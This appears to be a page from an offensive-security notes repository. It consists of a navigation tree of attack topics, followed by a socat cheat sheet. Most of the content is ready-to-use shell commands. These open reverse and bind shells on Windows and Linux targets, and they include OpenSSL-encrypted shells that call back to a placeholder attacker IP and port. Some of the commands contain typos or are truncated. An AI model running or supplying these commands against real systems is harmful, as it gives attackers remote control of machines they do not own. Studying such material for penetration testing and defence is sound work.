Crypto

Openssl

Enumeration

Containers

Docs

Snmp

Network_scanners

Windows

Exfiltration

Dns

Linux

Windows

Exploit

CPUs

meltdown

Binaries

aslr

Buffer_overflow

Docs

ropping

Canary_bypass

canary_bypass

Format_string

format_string

Integral_promotion

integral_promotion

Dns

zone_transfer

Hashes

collision

Imagemagick

imagetragick

Java

OGNL

cve_2022_26134

Level3_hypervisor

Docker_sec

docker

Linux

capabilities

Dirty_pipe

dirty_pipe

Pkexec

CVE_2021_4034

Sudo

wildard_exploitation

MacOS

Network

mac_spoofing

Padding

padbuster

Python

Samba

smbmap

Sqli

Ssl_tls

heartbleed

Web

Bypass_rate_limiting

bypass_rate_limiting

command_injection

Content_security_policy

content_security_policy

cookie_tampering
csrf

Forced_browsing

forced_browsing

http_header_injection

Idor

idor

Javascript

Jwt

local_file_inclusion
methodology

Nodejs

deserialization

Php

re_registration
remote_file_inclusion

Ssrf

Ssti

ssti

Xxe

Windows

Dll_hijacking

dll_hijacking

Docs

Macros

macros

Payloads

windows_scripting_host

Print_nightmare

CVE-2021-1675

Nightmare-dll

print_nightmare

Process_injection

Service_escalation

service_escalation

Zero_logon

zero_logon

Yaml

deserialization

Forensics

Hashes

Bruteforce

Password_cracking

Password_guessing

standard_passwords

Misc

Active_directory

Printer_hacking

preta

Telecommunications

_sipvicious

.github

ISSUE_TEMPLATE

Sipvicious

sip_vicious

Threat_intelligence

Wifi

airmon-ng

Osint

recon_ng

Social_engineering

spiderfoot
theharvester

Persistence

Post exploitation

Seatbelt

.github

ISSUE_TEMPLATE

CHANGELOG

Seatbelt

Commands

Windows

EventLogs

Output

Bc_security

Docs

Windows

pivoting

Priv_esc

Docs

linux_priv_esc
pspy

Windows

Kernel-exploits

Privesc-scripts

Docs

get_script_onto_target

Suid

Reverse engineering

Android

misc

Docs

Java

krakatau

Reverse shells

Docs

firewalls

Windows

Stego

Docs

socat cheat sheet

socat cheat sheet

Reverse Shell

reverse shell listener

socat tcp-l:<port> - socat TCP-L:<PORT> file:`tty`,raw,echo=0

windows target

socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes

linux target

socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane

Bind Shell

generic connect

socat TCP:<TARGET-IP>:<TARGET-PORT> -

windows target listener

socat TCP-L:<PORT> EXEC:powershell.exe,pipes

linux target listener

```socat TCP-L: EXEC:"bash -li"

Connect from statically compiled socat to LHOST

Binary is inside this dir socat TCP:<ATTACKER-IP>:<ATTACKER-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane

Encrypted Shell

create key + cert

openssll req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt

create pem file

cat shell.key shell.crt > shell.pem

reverse shell listener

socat openssl-listen:<port>,cert=shell.pem,verify=0 - socat openssl-listen:<port>,cert=shell.pem,verify=0 file:`tty`,raw,echo=0

connecting shell on target to listener

socat openssl:<attacker-ip>:<attacker-port>,verify=0 exec:/bin/bash socat openssl:<attacker-ip>:<attacker-port>,verify=0 exec:"bash -li",pty,stderr,sigint,setsid,sane

encrypted bind shell on windows listening

target socat openssl-listen:<local-ip>:<local-port>,verify=0 exec:cmd.exe,pipes

encrypted bind shell attacker connecting

socat openssl:<port>,cert=shell.pem,verify=0 -